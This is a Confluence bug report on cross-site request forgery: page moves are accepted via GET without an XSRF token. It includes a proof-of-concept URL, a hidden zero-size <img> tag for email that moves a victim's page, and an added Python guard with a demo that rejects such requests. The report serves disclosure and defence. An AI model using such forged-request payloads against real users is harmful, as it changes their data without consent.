Confluence Data Center: CONFSERVER-30750

Moving pages around spaces using HTTP get without XSRF token


Description

      Seems like you can easily move pages around spaces by just hitting the movepage action using GET, like this:

      http://localhost:8080/confluence/pages/movepage.action?pageId=787055&position=topLevel&spaceKey=S2

      Malicious example of how to exploit this (in an email message):

      <img src="http://localhost:8080/confluence/pages/movepage.action?pageId=787055&position=topLevel&spaceKey=S2" style="height:0;width:0">

      (after opening the email, the page has been moved to S2 space)

      scary!!
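The report above shows why a state-changing action that answers to GET is forgeable from an `<img>` tag: the browser sends the victim's session cookie with the request, and nothing proves the user intended the move. The following Python guard is an added illustration, not Confluence's own code; the `Session`, `Request` and `PageStore` classes, the in-memory page table and the `xsrf_token` parameter name are assumptions. It replays the report's GET and then the guarded variants, accepting only a POST whose token matches the caller's own session.

```python
import hmac
import secrets
from dataclasses import dataclass, field
from urllib.parse import parse_qs, urlsplit

# Methods that must never change server state: a browser issues them for <img>
# sources and plain links without any user intent, which is what the report abuses.
SAFE_METHODS = {"GET", "HEAD", "OPTIONS"}

# Actions that change state and therefore need POST plus a session-bound token
# (hypothetical allow-list; only the action from the report is listed).
PROTECTED_PATHS = {"/confluence/pages/movepage.action"}


@dataclass
class Session:
    session_id: str
    # Per-session secret the server embeds in its own forms. A third-party page
    # or email cannot read it, so a cross-site request cannot include it.
    xsrf_token: str = field(default_factory=lambda: secrets.token_urlsafe(32))


@dataclass
class Request:
    method: str
    path: str
    params: dict
    session: Session  # the session the browser's cookie resolved to


class XsrfRejected(Exception):
    """Raised when a protected action fails the guard."""


def request_from_url(method, url, session):
    """Build a Request from a full URL such as the one in the report."""
    parts = urlsplit(url)
    params = {k: v[0] for k, v in parse_qs(parts.query).items()}
    return Request(method, parts.path, params, session)


def check_xsrf(req):
    """Reject any protected action that is not an authentic, intended POST."""
    if req.path not in PROTECTED_PATHS:
        return
    if req.method in SAFE_METHODS:
        raise XsrfRejected(f"{req.method} must not trigger {req.path}")
    supplied = req.params.get("xsrf_token", "")
    expected = req.session.xsrf_token
    # Constant-time comparison so the check does not leak the token byte by byte.
    if not hmac.compare_digest(supplied.encode(), expected.encode()):
        raise XsrfRejected("missing or invalid XSRF token")


class PageStore:
    """Constructed in-memory stand-in for the pages table: pageId -> spaceKey."""

    def __init__(self):
        self.space_of = {"787055": "S1"}  # constructed starting state

    def move_page(self, req):
        check_xsrf(req)  # guard runs before any state changes
        page_id = req.params["pageId"]
        self.space_of[page_id] = req.params["spaceKey"]
        return self.space_of[page_id]


def attempt(store, req):
    """Try a move and report whether the guard let it through."""
    try:
        store.move_page(req)
        return "moved"
    except XsrfRejected:
        return "rejected"


def demo():
    """Replay the report's GET and three POST variants; return the outcomes."""
    store = PageStore()
    victim = Session("victim-session")
    url = ("http://localhost:8080/confluence/pages/movepage.action"
           "?pageId=787055&position=topLevel&spaceKey=S2")
    attacker_token = Session("attacker-session").xsrf_token
    outcomes = {
        # The <img src=...> from the report: a GET carrying no token.
        "img_get": attempt(store, request_from_url("GET", url, victim)),
        # A cross-site auto-submitted form: right method, but no token.
        "post_no_token": attempt(store, request_from_url("POST", url, victim)),
        # A POST carrying a token that belongs to a different session.
        "post_wrong_token": attempt(
            store, request_from_url("POST", f"{url}&xsrf_token={attacker_token}", victim)),
        # The legitimate move from the application's own form, token included.
        "post_valid_token": attempt(
            store, request_from_url("POST", f"{url}&xsrf_token={victim.xsrf_token}", victim)),
    }
    outcomes["final_space"] = store.space_of["787055"]
    return outcomes


if __name__ == "__main__":
    print(demo())
```

The method check alone already defeats the `<img>` vector from the report, since an image request is always a GET; the token check is what stops the same forgery re-issued as a cross-site POST. Checking the token before touching the store matters because a rejected request must leave the page where it was.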

People: psaw PatrickA; iloire Ivan Loire (Inactive)
Votes: 0
Watchers: 6
